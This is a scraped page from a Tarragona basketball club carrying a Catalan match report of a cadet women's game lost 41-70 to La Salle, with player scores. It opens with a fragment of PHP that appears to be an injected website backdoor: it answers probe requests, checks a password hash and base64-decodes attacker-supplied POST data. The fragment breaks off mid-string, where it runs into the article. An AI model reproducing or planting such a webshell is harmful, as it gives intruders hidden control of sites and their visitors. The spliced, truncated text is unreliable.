function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" La defensa en zona de La Salle acaba amb la ratxa victoriosa del cadet femení A (41-70) - Tgn Bàsquet Club -

La defensa en zona de La Salle acaba amb la ratxa victoriosa del cadet femení A (41-70)

Updated: maig 3, 2014

L’equip cadet femení A del TGN Bàsquet va caure contra el seu gran rival, La Salle Tarragona 99, i no va poder mantenir la imbatibilitat en la segona fase del campionat. Les noies que entrena Laureà Català van fer un bon inici de partit però es van estavellar contra la defensa en zona de les visitants. La pivot de la Salle Ferrus, a més, es va fer la senyora de la zona i el conjunt local no la podia aturar. Quan ho va fer, un parell de triples de les visitants van ser clau perquè la iniciativa estigués en mans de La Salle (15-30 al descans). Tot i els intents locals per ordenar els atacs, l’apartat ofensiu no es va resoldre mai i això va condicionar la defensa del TGN Bàsquet que entrava a l’últim quart amb un desavantatge massa gran (26-53).

NEMSER TGN BASQUET A – AB LA SALLE TARRAGONA    41-70

TGN BÀSQUET : Pedrol, Tibau (12), Anton (2), Gulli (9), Bazan (6) – cinc inicial- Barreira (2), Benaiges (4), Farre , Masdeu, Arfelis, Abellan (6). Tirs lliures 7/17. Faltes 11. Sense eliminades.

AB LA SALLE TARRAGONA. Campabadal (10), Gonzalez (5), Martiniello (12), Ferrus (20), Garcia (9) –cinc inicial- Almagro, Alsina, Ventura, Loras, , Domenech, Clua (14). Tirs Lliures 5/9. Triples 3: Campabadal (2), Garcia (1). Faltes 13. Eliminada: Gonzàlez 38’

Parcials:  9-17 / 6-13 (15-30 descans) / 11-23 / 15-17

Àrbitre: Carrión